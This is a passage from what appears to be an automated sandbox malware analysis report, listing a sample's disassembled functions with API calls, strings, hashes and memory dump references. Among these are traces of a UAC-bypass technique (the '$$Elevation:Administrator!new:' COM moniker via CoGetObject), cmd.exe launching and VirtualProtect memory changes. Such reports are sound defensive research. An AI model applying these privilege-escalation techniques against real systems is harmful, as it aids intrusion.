                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0ae50f5eb3c30b6def060569edfd5a96dae8f03997bbe75f6d7b2be729599e56
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62b649c32f93d2337679038de5d7ba034d8f130c97f012f79e63509bd4f77841
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B31154B1C1020CABCB10EF94DD85AEE7778AB54305F14456AFA097A181E738EB44CBA5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040D17F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CoGetObject.OLE32(?,00000024,?,?), ref: 0040D1EB
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Object
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $$Elevation:Administrator!new:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2936123098-4251798642
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 69272883a17b5f6f07e2d21893714d2c4baf9a1707031f0601c46702adeeea6a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b31a3ccbf289bc63fcd2c03f84205c468a6b0dd351633bc6c62a4601e098767b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69272883a17b5f6f07e2d21893714d2c4baf9a1707031f0601c46702adeeea6a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 140162B2810208ABCB05EF90DC95DDE7B78AB18305F08455EF9057A181EB39E748CB75
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004063CE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040A945
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405312: RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405312: RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Process$ChangeCloseEnvironmentExitExpandFindFreeInitLocalNotificationOpenStringStrings_TokenUnicode
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %systemroot%\system32\cmd.exe$/C
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1629495445-3057154508
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e58d919228d2999fb42e63e86339d7c771dc9b38e1630fc07efea9b8c1ce01d4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6885a5c3f576ce6d6f9b2f3c688c14414178aeb406d1450dcc701d4c4953fbe4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e58d919228d2999fb42e63e86339d7c771dc9b38e1630fc07efea9b8c1ce01d4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0A4F280030866CB10EB70DC46FDA33389B14305F0045BAB609B60C2EE7997C88AAD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004050A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,00520000), ref: 004050CC
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,explorer.exe), ref: 004050DE
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InitStringUnicode
                                                                                                                                                                                                                                                                                                                                                                  • String ID: explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4228678080-3187896405
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 050ed0569a6514cfdb40d37d4b6a842c1993e2635d6f26a1999b978f90a0d4ff
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAF09074204248EFCB04CF54C880E6ABBA6FB49304F20855AFC0597381C674ED91CB9A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 00409B30 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 126 409b97 124->126 127 409b99-409b9b 124->127 125->124 128 409b7a-409b7d 125->128 126->127 130 409baa-409bad 127->130 128->124 129 409b7f-409b82 128->129 129->124 129->127 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                                                                                                                                                                                                                                                                                                  • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                                                                                                                                                                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2441996862-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004051FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                                                                                                                                                                                                                                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3256987805-3653653586
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040A0E7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,01FB0868), ref: 0040966C
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(000D023E,000000FC,00409918), ref: 0040A148
                                                                                                                                                                                                                                                                                                                                                                  • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                                                                                                                                                                                                                                                                                  • 73EA5CF0.USER32(000D023E,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                                                                                                                                                                                                                                                                                                  • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3341979996-3001827809
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-2130885113
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040A0D5 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(000D023E,000000FC,00409918), ref: 0040A148
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90,00000000), ref: 00409A28
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90), ref: 00409A5C
                                                                                                                                                                                                                                                                                                                                                                  • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                                                                                                                                                                                                                                                                                  • 73EA5CF0.USER32(000D023E,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 978128352-3001827809
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004099A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90,00000000), ref: 00409A28
